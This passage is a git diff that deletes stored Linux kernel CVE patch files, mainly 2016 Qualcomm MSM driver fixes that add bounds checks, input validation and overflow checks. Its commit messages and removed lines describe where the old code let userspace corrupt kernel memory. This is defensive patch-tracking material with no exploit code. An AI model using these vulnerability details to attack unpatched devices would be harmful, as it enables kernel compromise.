--  \param - pAdapter - Adapter upon which the command was received
--  \param - command - command that was received, ASCII command followed
--                     by binary data
-+	if (params->len <= 0 || params->len > ANDROID_WIFI_ACTION_FRAME_SIZE ||
-+            (params->len > total_len)) {
-+		hddLog(LOGE, FL("Invalid payload length: %d"), params->len);
-+		return -EINVAL;
-+	}
- 
--  \return - 0 for success non-zero for failure
-+	if (!mac_pton(params->bssid, (u8 *)&bssid)) {
-+		hddLog(LOGE, FL("MAC address parsing failed"));
-+		return -EINVAL;
-+	}
- 
--  --------------------------------------------------------------------------*/
--static int
--hdd_parse_sendactionframe_v2(hdd_adapter_t *pAdapter,
--                             const char *command)
--{
--   struct android_wifi_af_params *params;
--   tSirMacAddr bssid;
--   int ret;
-+	if (params->channel < 0 ||
-+	    params->channel > WNI_CFG_CURRENT_CHANNEL_STAMAX) {
-+		hddLog(LOGE, FL("Invalid channel: %d"), params->channel);
-+		return -EINVAL;
-+	}
- 
--   /* params are large so keep off the stack */
--   params = kmalloc(sizeof(*params), GFP_KERNEL);
--   if (!params) return -ENOMEM;
-+	if (params->dwell_time < 0) {
-+		hddLog(LOGE, FL("Invalid dwell_time: %d"), params->dwell_time);
-+		return -EINVAL;
-+	}
- 
--   /* The params are located after "SENDACTIONFRAME " */
--   memcpy(params, command + 16, sizeof(*params));
-+	ret = hdd_sendactionframe(pAdapter, bssid, params->channel,
-+				params->dwell_time, params->len, params->data);
- 
--   if (!mac_pton(params->bssid, (u8 *)&bssid)) {
--      hddLog(LOGE, "%s: MAC address parsing failed", __func__);
--      ret = -EINVAL;
--   } else {
--      ret = hdd_sendactionframe(pAdapter, bssid, params->channel,
--                                params->dwell_time, params->len, params->data);
--   }
--   kfree(params);
--   return ret;
-+	return ret;
- }
- 
- /*
-@@ -2429,7 +2440,8 @@ hdd_parse_sendactionframe_v2(hdd_adapter_t *pAdapter,
- 
-   --------------------------------------------------------------------------*/
- static int
--hdd_parse_sendactionframe(hdd_adapter_t *pAdapter, const char *command)
-+hdd_parse_sendactionframe(hdd_adapter_t *pAdapter, const char *command,
-+                          int total_len)
- {
-    int ret;
- 
-@@ -2445,11 +2457,19 @@ hdd_parse_sendactionframe(hdd_adapter_t *pAdapter, const char *command)
-     * SENDACTIONFRAME xx:xx:xx:xx:xx:xx*
-     *           111111111122222222223333
-     * 0123456789012345678901234567890123
-+    *
-+    * For both the commands, a valid command must have atleast first 34 length
-+    * of data.
-     */
-+   if (total_len < 34) {
-+       hddLog(LOGE, FL("Invalid command (total_len=%d)"), total_len);
-+       return -EINVAL;
-+   }
-+
-    if (command[33]) {
-       ret = hdd_parse_sendactionframe_v1(pAdapter, command);
-    } else {
--      ret = hdd_parse_sendactionframe_v2(pAdapter, command);
-+      ret = hdd_parse_sendactionframe_v2(pAdapter, command, total_len);
-    }
- 
-    return ret;
-@@ -5851,7 +5871,8 @@ static int hdd_driver_command(hdd_adapter_t *pAdapter,
-        }
-        else if (strncmp(command, "SENDACTIONFRAME", 15) == 0)
-        {
--           ret = hdd_parse_sendactionframe(pAdapter, command);
-+           ret = hdd_parse_sendactionframe(pAdapter, command,
-+                                           priv_data.total_len);
-        }
-        else if (strncmp(command, "GETROAMSCANCHANNELMINTIME", 25) == 0)
-        {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3906/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3906/ANY/0001.patch
deleted file mode 100644
index 6b7ddda6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3906/ANY/0001.patch
+++ /dev/null
@@ -1,143 +0,0 @@
-From b333d32745fec4fb1098ee1a03d4425f3c1b4c2e Mon Sep 17 00:00:00 2001
-From: Archana Sathyakumar <asathyak@codeaurora.org>
-Date: Mon, 22 Aug 2016 15:20:02 -0600
-Subject: msm-core: debug: Update the number of supported pstates.
-
-Update the number of power-freq pair value supported in the debug
-interface. Parse the arguments as uint32_t instead of uint64_t which
-might cause memory corruption.
-
-CRs-fixed: 1054344
-Change-Id: I30492b79b96356177cdcc72e4e2ee656317de500
-Signed-off-by: Archana Sathyakumar <asathyak@codeaurora.org>
----
- drivers/power/qcom/debug_core.c | 51 +++++++++++++++++++++++++----------------
- 1 file changed, 31 insertions(+), 20 deletions(-)
-
-diff --git a/drivers/power/qcom/debug_core.c b/drivers/power/qcom/debug_core.c
-index e9c578f..ccef04a 100644
---- a/drivers/power/qcom/debug_core.c
-+++ b/drivers/power/qcom/debug_core.c
-@@ -84,15 +84,28 @@ static struct debugfs_blob_wrapper help_msg = {
- 
- };
- 
--static void add_to_ptable(uint64_t *arg)
-+static void add_to_ptable(unsigned int *arg)
- {
- 	struct core_debug *node;
- 	int i, cpu = arg[CPU_OFFSET];
-+	uint32_t freq = arg[FREQ_OFFSET];
-+	uint32_t power = arg[POWER_OFFSET];
- 
- 	if (!cpu_possible(cpu))
- 		return;
- 
-+	if ((freq == 0) || (power == 0)) {
-+		pr_warn("Incorrect power data\n");
-+		return;
-+	}
-+
- 	node = &per_cpu(c_dgfs, cpu);
-+
-+	if (node->len >= MAX_PSTATES) {
-+		pr_warn("Dropped ptable update - no space left.\n");
-+		return;
-+	}
-+
- 	if (!node->head) {
- 		node->head = kzalloc(sizeof(struct cpu_pstate_pwr) *
- 				     (MAX_PSTATES + 1),
-@@ -100,24 +113,18 @@ static void add_to_ptable(uint64_t *arg)
- 		if (!node->head)
- 			return;
- 	}
--	for (i = 0; i < MAX_PSTATES; i++) {
--		if (node->head[i].freq == arg[FREQ_OFFSET]) {
--			node->head[i].power = arg[POWER_OFFSET];
-+
-+	for (i = 0; i < node->len; i++) {
-+		if (node->head[i].freq == freq) {
-+			node->head[i].power = power;
- 			return;
- 		}
--		if (node->head[i].freq == 0)
--			break;
--	}
--
--	if (i == MAX_PSTATES) {
--		pr_warn("Dropped ptable update - no space left.\n");
--		return;
- 	}
- 
- 	/* Insert a new frequency (may need to move things around to
- 	   keep in ascending order). */
- 	for (i = MAX_PSTATES - 1; i > 0; i--) {
--		if (node->head[i-1].freq > arg[FREQ_OFFSET]) {
-+		if (node->head[i-1].freq > freq) {
- 			node->head[i].freq = node->head[i-1].freq;
- 			node->head[i].power = node->head[i-1].power;
- 		} else if (node->head[i-1].freq != 0) {
-@@ -125,15 +132,17 @@ static void add_to_ptable(uint64_t *arg)
- 		}
- 	}
- 
--	node->head[i].freq = arg[FREQ_OFFSET];
--	node->head[i].power = arg[POWER_OFFSET];
--	node->len++;
-+	if (node->len < MAX_PSTATES) {
-+		node->head[i].freq = freq;
-+		node->head[i].power = power;
-+		node->len++;
-+	}
- 
- 	if (node->ptr)
- 		node->ptr->len = node->len;
- }
- 
--static int split_ptable_args(char *line, uint64_t *arg, uint32_t n)
-+static int split_ptable_args(char *line, unsigned int *arg, uint32_t n)
- {
- 	char *args;
- 	int i;
-@@ -143,7 +152,9 @@ static int split_ptable_args(char *line, uint64_t *arg, uint32_t n)
- 		if (!line)
- 			break;
- 		args = strsep(&line, " ");
--		ret = kstrtoull(args, 10, &arg[i]);
-+		ret = kstrtouint(args, 10, &arg[i]);
-+		if (ret)
-+			return ret;
- 	}
- 	return ret;
- }
-@@ -153,7 +164,7 @@ static ssize_t msm_core_ptable_write(struct file *file,
- {
- 	char *kbuf;
- 	int ret;
--	uint64_t arg[3];
-+	unsigned int arg[3];
- 
- 	if (len == 0)
- 		return 0;
-@@ -205,7 +216,7 @@ static int msm_core_ptable_read(struct seq_file *m, void *data)
- 			seq_printf(m, "--- CPU%d - Live numbers at %ldC---\n",
- 			cpu, node->ptr->temp);
- 			print_table(m, msm_core_data[cpu].ptable,
--					msm_core_data[cpu].len);
-+					node->driver_len);
- 		}
- 	}
- 	return 0;
-@@ -216,7 +227,7 @@ static ssize_t msm_core_enable_write(struct file *file,
- {
- 	char *kbuf;
- 	int ret;
--	uint64_t arg[3];
-+	unsigned int arg[3];
- 	int cpu;
- 
- 	if (len == 0)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3907/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2016-3907/3.10/0002.patch
deleted file mode 100644
index f57f2f22..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3907/3.10/0002.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 289ede9d6bfb46178326ae9ca86033bbd452f269 Mon Sep 17 00:00:00 2001
-From: Siena Richard <sienar@codeaurora.org>
-Date: Tue, 16 Aug 2016 13:03:56 -0700
-Subject: misc: qcom: qdsp6v2: initialize wma_config_32
-
-Not all memebers of wma_config_32 are set before they are used which
-might lead to invalid values being passed and used. To fix this issue
-initialize all member variables of struct wma_config_32 to 0 before
-assigning specific values individually.
-
-Change-Id: Ibb082ce691625527e9a9ffd4978dea7ba4df9e84
-CRs-Fixed: 1054352
-Signed-off-by: Siena Richard <sienar@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_wma.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_wma.c b/drivers/misc/qcom/qdsp6v2/audio_wma.c
-index 3d57d38d..4389c0f 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_wma.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_wma.c
-@@ -166,6 +166,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- 		struct msm_audio_wma_config_v2 *wma_config;
- 		struct msm_audio_wma_config_v2_32 wma_config_32;
- 
-+		memset(&wma_config_32, 0, sizeof(wma_config_32));
-+
- 		wma_config = (struct msm_audio_wma_config_v2 *)audio->codec_cfg;
- 		wma_config_32.format_tag = wma_config->format_tag;
- 		wma_config_32.numchannels = wma_config->numchannels;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3907/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2016-3907/3.18/0001.patch
deleted file mode 100644
index 3dab7180..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3907/3.18/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 744330f4e5d70dce71c4c9e03c5b6a8b59bb0cda Mon Sep 17 00:00:00 2001
-From: Siena Richard <sienar@codeaurora.org>
-Date: Tue, 16 Aug 2016 13:03:56 -0700
-Subject: misc: qcom: qdsp6v2: initialize wma_config_32
-
-Not all memebers of wma_config_32 are set before they are used which
-might lead to invalid values being passed and used. To fix this issue
-initialize all member variables of struct wma_config_32 to 0 before
-assigning specific values individually.
-
-Change-Id: Ibb082ce691625527e9a9ffd4978dea7ba4df9e84
-CRs-Fixed: 1054352
-Signed-off-by: Siena Richard <sienar@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_wma.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_wma.c b/drivers/misc/qcom/qdsp6v2/audio_wma.c
-index 9877937..cb5a9b1 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_wma.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_wma.c
-@@ -162,6 +162,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- 		struct msm_audio_wma_config_v2 *wma_config;
- 		struct msm_audio_wma_config_v2_32 wma_config_32;
- 
-+		memset(&wma_config_32, 0, sizeof(wma_config_32));
-+
- 		wma_config = (struct msm_audio_wma_config_v2 *)audio->codec_cfg;
- 		wma_config_32.format_tag = wma_config->format_tag;
- 		wma_config_32.numchannels = wma_config->numchannels;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3931/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3931/ANY/0001.patch
deleted file mode 100644
index 054d871e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3931/ANY/0001.patch
+++ /dev/null
@@ -1,134 +0,0 @@
-From e80b88323f9ff0bb0e545f209eec08ec56fca816 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Mon, 18 Jul 2016 13:20:18 -0700
-Subject: qseecom: validate the inputs of __qseecom_send_modfd_resp
-
-The resp_len and resp_buf_ptr of qseecom_send_modfd_listener_resp
-are not checked, then an userspace application that manipulates
-resp_len can corrupt the kernel memory. Thus make changes to
-validate these parameters.
-
-CRs-fixed: 1036418
-Change-Id: Id43ec6b55b332d0dac09a9abb998a410f49b44f7
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/misc/qseecom.c | 78 +++++++++++++++++++++++++++++++++++++++-----------
- 1 file changed, 61 insertions(+), 17 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index b175965c..1168181 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -3065,41 +3065,80 @@ static int qseecom_send_resp(void)
- }
- 
- 
--static int qseecom_send_modfd_resp(struct qseecom_dev_handle *data,
--						void __user *argp)
-+static int __validate_send_modfd_resp_inputs(struct qseecom_dev_handle *data,
-+			struct qseecom_send_modfd_listener_resp *resp,
-+			struct qseecom_registered_listener_list *this_lstnr)
- {
--	struct qseecom_send_modfd_listener_resp resp;
- 	int i;
--	struct qseecom_registered_listener_list *this_lstnr = NULL;
- 
--	if (copy_from_user(&resp, argp, sizeof(resp))) {
--		pr_err("copy_from_user failed");
-+	if (!data || !resp || !this_lstnr) {
-+		pr_err("listener handle or resp msg is null\n");
- 		return -EINVAL;
- 	}
--	this_lstnr = __qseecom_find_svc(data->listener.id);
--	if (this_lstnr == NULL)
-+
-+	if (resp->resp_buf_ptr == NULL) {
-+		pr_err("resp buffer is null\n");
-+		return -EINVAL;
-+	}
-+	/* validate resp buf length */
-+	if ((resp->resp_len == 0) ||
-+			(resp->resp_len > this_lstnr->sb_length)) {
-+		pr_err("resp buf length %d not valid\n", resp->resp_len);
- 		return -EINVAL;
-+	}
- 
--	if (resp.resp_buf_ptr == NULL) {
--		pr_err("Invalid resp_buf_ptr\n");
-+	if ((uintptr_t)resp->resp_buf_ptr > (ULONG_MAX - resp->resp_len)) {
-+		pr_err("Integer overflow in resp_len & resp_buf\n");
-+		return -EINVAL;
-+	}
-+	if ((uintptr_t)this_lstnr->user_virt_sb_base >
-+					(ULONG_MAX - this_lstnr->sb_length)) {
-+		pr_err("Integer overflow in user_virt_sb_base & sb_length\n");
- 		return -EINVAL;
- 	}
-+	/* validate resp buf */
-+	if (((uintptr_t)resp->resp_buf_ptr <
-+		(uintptr_t)this_lstnr->user_virt_sb_base) ||
-+		((uintptr_t)resp->resp_buf_ptr >=
-+		((uintptr_t)this_lstnr->user_virt_sb_base +
-+				this_lstnr->sb_length)) ||
-+		(((uintptr_t)resp->resp_buf_ptr + resp->resp_len) >
-+		((uintptr_t)this_lstnr->user_virt_sb_base +
-+						this_lstnr->sb_length))) {
-+		pr_err("resp buf is out of shared buffer region\n");
-+		return -EINVAL;
-+	}
-+
- 	/* validate offsets */
- 	for (i = 0; i < MAX_ION_FD; i++) {
--		if (resp.ifd_data[i].cmd_buf_offset >= resp.resp_len) {
-+		if (resp->ifd_data[i].cmd_buf_offset >= resp->resp_len) {
- 			pr_err("Invalid offset %d = 0x%x\n",
--				i, resp.ifd_data[i].cmd_buf_offset);
-+				i, resp->ifd_data[i].cmd_buf_offset);
- 			return -EINVAL;
- 		}
- 	}
- 
--	if ((resp.resp_buf_ptr < this_lstnr->user_virt_sb_base) ||
--		((uintptr_t)resp.resp_buf_ptr >=
--		((uintptr_t)this_lstnr->user_virt_sb_base +
--				this_lstnr->sb_length))) {
--		pr_err("resp_buf_ptr address not within shared buffer\n");
-+	return 0;
-+}
-+
-+static int __qseecom_send_modfd_resp(struct qseecom_dev_handle *data,
-+				void __user *argp, bool is_64bit_addr)
-+{
-+	struct qseecom_send_modfd_listener_resp resp;
-+	struct qseecom_registered_listener_list *this_lstnr = NULL;
-+
-+	if (copy_from_user(&resp, argp, sizeof(resp))) {
-+		pr_err("copy_from_user failed");
- 		return -EINVAL;
- 	}
-+
-+	this_lstnr = __qseecom_find_svc(data->listener.id);
-+	if (this_lstnr == NULL)
-+		return -EINVAL;
-+
-+	if (__validate_send_modfd_resp_inputs(data, &resp, this_lstnr))
-+		return -EINVAL;
-+
- 	resp.resp_buf_ptr = this_lstnr->sb_virt +
- 		(uintptr_t)(resp.resp_buf_ptr - this_lstnr->user_virt_sb_base);
- 	__qseecom_update_cmd_buf(&resp, false, data, true);
-@@ -3108,6 +3147,11 @@ static int qseecom_send_modfd_resp(struct qseecom_dev_handle *data,
- 	return 0;
- }
- 
-+static int qseecom_send_modfd_resp(struct qseecom_dev_handle *data,
-+					void __user *argp)
-+{
-+	return __qseecom_send_modfd_resp(data, argp, false);
-+}
- 
- static int qseecom_get_qseos_version(struct qseecom_dev_handle *data,
- 						void __user *argp)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3934/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3934/ANY/0001.patch
deleted file mode 100644
index a0cdb855..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3934/ANY/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From 27fbeb6b025d5d46ccb0497cbed4c6e78ed1c5cc Mon Sep 17 00:00:00 2001
-From: Vasko Kalanoski <vaskok@codeaurora.org>
-Date: Tue, 3 Feb 2015 13:17:44 +0200
-Subject: msm: camera: restructure data handling to be more robust
-
-add dynamic array allocation instead of static to prevent
-stack overflow.
-
-Change-Id: Id12ed5b01809021d2b1d1d71436f2523b575d9de
-Signed-off-by: Vasko Kalanoski <vaskok@codeaurora.org>
----
- .../msm/camera_v2/sensor/io/msm_camera_cci_i2c.c   | 25 +++++++++++++++-------
- 1 file changed, 17 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-index 4b0bde95..59ad29f 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -138,23 +138,30 @@ int32_t msm_camera_cci_i2c_write_seq(struct msm_camera_i2c_client *client,
- 	int32_t rc = -EFAULT;
- 	uint8_t i = 0;
- 	struct msm_camera_cci_ctrl cci_ctrl;
--	struct msm_camera_i2c_reg_array reg_conf_tbl[num_byte];
-+	struct msm_camera_i2c_reg_array *reg_conf_tbl = NULL;
- 
- 	if ((client->addr_type != MSM_CAMERA_I2C_BYTE_ADDR
- 		&& client->addr_type != MSM_CAMERA_I2C_WORD_ADDR)
- 		|| num_byte == 0)
- 		return rc;
- 
--	S_I2C_DBG("%s reg addr = 0x%x num bytes: %d\n",
--			  __func__, addr, num_byte);
--	memset(reg_conf_tbl, 0,
--		num_byte * sizeof(struct msm_camera_i2c_reg_array));
--	reg_conf_tbl[0].reg_addr = addr;
- 	if (num_byte > I2C_SEQ_REG_DATA_MAX) {
- 		pr_err("%s: num_byte=%d clamped to max supported %d\n",
- 			__func__, num_byte, I2C_SEQ_REG_DATA_MAX);
--		num_byte = I2C_SEQ_REG_DATA_MAX;
-+		return rc;
- 	}
-+
-+	S_I2C_DBG("%s reg addr = 0x%x num bytes: %d\n",
-+		__func__, addr, num_byte);
-+
-+	reg_conf_tbl = kzalloc(num_byte *
-+		(sizeof(struct msm_camera_i2c_reg_array)), GFP_KERNEL);
-+	if (!reg_conf_tbl) {
-+		pr_err("%s:%d no memory\n", __func__, __LINE__);
-+		return -ENOMEM;
-+	}
-+
-+	reg_conf_tbl[0].reg_addr = addr;
- 	for (i = 0; i < num_byte; i++) {
- 		reg_conf_tbl[i].reg_data = data[i];
- 		reg_conf_tbl[i].delay = 0;
-@@ -169,6 +176,8 @@ int32_t msm_camera_cci_i2c_write_seq(struct msm_camera_i2c_client *client,
- 			core, ioctl, VIDIOC_MSM_CCI_CFG, &cci_ctrl);
- 	CDBG("%s line %d rc = %d\n", __func__, __LINE__, rc);
- 	rc = cci_ctrl.status;
-+	kfree(reg_conf_tbl);
-+	reg_conf_tbl = NULL;
- 	return rc;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3935/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3935/ANY/0001.patch
deleted file mode 100644
index 4b807753..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3935/ANY/0001.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From 5f69ccf3b011c1d14a1b1b00dbaacf74307c9132 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Fri, 29 Jul 2016 15:32:31 -0700
-Subject: msm: crypto: Fix integer over flow check in qcedev driver
-
-Integer overflow check always fails when ULONG_MAX is used,
-as ULONG_MAX is 2^64-1, while req->data[i].len and total
-are uint32_t. Make change to use U32_MAX instead of
-ULONG_MAX.
-
-CRs-fixed: 1046507
-Change-Id: Iccf9c32400ecc7ffc0afae16f58c38e5d78a5b64
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/crypto/msm/qcedev.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c
-index 51f5069..e63f061 100644
---- a/drivers/crypto/msm/qcedev.c
-+++ b/drivers/crypto/msm/qcedev.c
-@@ -1,6 +1,6 @@
- /* Qualcomm CE device driver.
-  *
-- * Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1543,7 +1543,7 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req,
- 	}
- 	/* Check for sum of all dst length is equal to data_len  */
- 	for (i = 0; i < req->entries; i++) {
--		if (req->vbuf.dst[i].len >= ULONG_MAX - total) {
-+		if (req->vbuf.dst[i].len >= U32_MAX - total) {
- 			pr_err("%s: Integer overflow on total req dst vbuf length\n",
- 				__func__);
- 			goto error;
-@@ -1557,7 +1557,7 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req,
- 	}
- 	/* Check for sum of all src length is equal to data_len  */
- 	for (i = 0, total = 0; i < req->entries; i++) {
--		if (req->vbuf.src[i].len > ULONG_MAX - total) {
-+		if (req->vbuf.src[i].len > U32_MAX - total) {
- 			pr_err("%s: Integer overflow on total req src vbuf length\n",
- 				__func__);
- 			goto error;
-@@ -1619,7 +1619,7 @@ static int qcedev_check_sha_params(struct qcedev_sha_op_req *req,
- 
- 	/* Check for sum of all src length is equal to data_len  */
- 	for (i = 0, total = 0; i < req->entries; i++) {
--		if (req->data[i].len > ULONG_MAX - total) {
-+		if (req->data[i].len > U32_MAX - total) {
- 			pr_err("%s: Integer overflow on total req buf length\n",
- 				__func__);
- 			goto sha_error;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3938/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3938/ANY/0001.patch
deleted file mode 100644
index 6b340a02..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3938/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 467c81f9736b1ebc8d4ba70f9221bba02425ca10 Mon Sep 17 00:00:00 2001
-From: Shalini Krishnamoorthi <shakri@codeaurora.org>
-Date: Tue, 2 Aug 2016 10:29:00 -0700
-Subject: msm: mdss: Fix to validate data copied from user space
-
-The overlay zorder values copied from user space are used
-as index in left_lm_zo_cnt and right_lm_zo_cnt. This fix
-will validate the overlay zorder value copied from user
-space to not go beyond MDSS_MDP_MAX_STAGE, thus preventing
-any arbitrary increments in kernel memory.
-
-CRs-Fixed: 1049232
-Change-Id: Ie8e65ce9f58cb357204bfa4c6a6e0fccec82d5ba
-Signed-off-by: Shalini Krishnamoorthi <shakri@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_mdp_overlay.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_mdp_overlay.c b/drivers/video/msm/mdss/mdss_mdp_overlay.c
-index 2024bd4..e8a91cf 100644
---- a/drivers/video/msm/mdss/mdss_mdp_overlay.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_overlay.c
-@@ -4070,16 +4070,20 @@ static int __mdss_overlay_src_split_sort(struct msm_fb_data_type *mfd,
- 		__overlay_swap_func);
- 
- 	for (i = 0; i < num_ovs; i++) {
-+		if (ovs[i].z_order >= MDSS_MDP_MAX_STAGE) {
-+			pr_err("invalid stage:%u\n", ovs[i].z_order);
-+			return -EINVAL;
-+		}
- 		if (ovs[i].dst_rect.x < left_lm_w) {
- 			if (left_lm_zo_cnt[ovs[i].z_order] == 2) {
--				pr_err("more than 2 ov @ stage%d on left lm\n",
-+				pr_err("more than 2 ov @ stage%u on left lm\n",
- 					ovs[i].z_order);
- 				return -EINVAL;
- 			}
- 			left_lm_zo_cnt[ovs[i].z_order]++;
- 		} else {
- 			if (right_lm_zo_cnt[ovs[i].z_order] == 2) {
--				pr_err("more than 2 ov @ stage%d on right lm\n",
-+				pr_err("more than 2 ov @ stage%u on right lm\n",
- 					ovs[i].z_order);
- 				return -EINVAL;
- 			}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3939/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3939/ANY/0001.patch
deleted file mode 100644
index b7308472..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3939/ANY/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From e0bb18771d6ca71db2c2a61226827059be3fa424 Mon Sep 17 00:00:00 2001
-From: Ping Li <pingli@codeaurora.org>
-Date: Fri, 15 Apr 2016 15:27:36 -0700
-Subject: msm: mdss: Correct block id check for mdss_mdp_misr_table
-
-DISPLAY_MISR_LCDC block doesn't have corresponding mdss_mdp_misr_table,
-this change corrects the block id check for mdss_mdp_misr_table.
-
-CRs-Fixed: 1001224
-Change-Id: I74b03c31542d4b239eb2ffdc4dc6345dff5eab86
-Signed-off-by: Ping Li <pingli@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_debug.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c
-index e4749c5..e1d4b5f 100644
---- a/drivers/video/msm/mdss/mdss_debug.c
-+++ b/drivers/video/msm/mdss/mdss_debug.c
-@@ -1266,7 +1266,7 @@ static inline struct mdss_mdp_misr_map *mdss_misr_get_map(u32 block_id,
- 	char *ctrl_reg = NULL, *value_reg = NULL;
- 	char *intf_base = NULL;
- 
--	if (block_id > DISPLAY_MISR_MDP) {
-+	if (block_id > DISPLAY_MISR_HDMI && block_id != DISPLAY_MISR_MDP) {
- 		pr_err("MISR Block id (%d) out of range\n", block_id);
- 		return NULL;
- 	}
-@@ -1408,12 +1408,16 @@ int mdss_misr_set(struct mdss_data_type *mdata,
- 	bool is_valid_wb_mixer = true;
- 	bool use_mdp_up_misr = false;
- 
-+	if (!mdata || !req || !ctl) {
-+		pr_err("Invalid input params: mdata = %p req = %p ctl = %p",
-+			mdata, req, ctl);
-+		return -EINVAL;
-+	}
- 	pr_debug("req[block:%d frame:%d op_mode:%d]\n",
- 		req->block_id, req->frame_count, req->crc_op_mode);
- 
- 	map = mdss_misr_get_map(req->block_id, ctl, mdata,
- 		ctl->is_video_mode);
--
- 	if (!map) {
- 		pr_err("Invalid MISR Block=%d\n", req->block_id);
- 		return -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3951/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3951/ANY/0001.patch
deleted file mode 100644
index 29b94c50..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3951/ANY/0001.patch
+++ /dev/null
@@ -1,87 +0,0 @@
-From 4d06dd537f95683aba3651098ae288b7cbff8274 Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Bj=C3=B8rn=20Mork?= <bjorn@mork.no>
-Date: Mon, 7 Mar 2016 21:15:36 +0100
-Subject: cdc_ncm: do not call usbnet_link_change from cdc_ncm_bind
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-usbnet_link_change will call schedule_work and should be
-avoided if bind is failing. Otherwise we will end up with
-scheduled work referring to a netdev which has gone away.
-
-Instead of making the call conditional, we can just defer
-it to usbnet_probe, using the driver_info flag made for
-this purpose.
-
-Fixes: 8a34b0ae8778 ("usbnet: cdc_ncm: apply usbnet_link_change")
-Reported-by: Andrey Konovalov <andreyknvl@gmail.com>
-Suggested-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Bjørn Mork <bjorn@mork.no>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- drivers/net/usb/cdc_ncm.c | 20 +++++---------------
- 1 file changed, 5 insertions(+), 15 deletions(-)
-
-diff --git a/drivers/net/usb/cdc_ncm.c b/drivers/net/usb/cdc_ncm.c
-index be92796..86ba30b 100644
---- a/drivers/net/usb/cdc_ncm.c
-+++ b/drivers/net/usb/cdc_ncm.c
-@@ -988,8 +988,6 @@ EXPORT_SYMBOL_GPL(cdc_ncm_select_altsetting);
- 
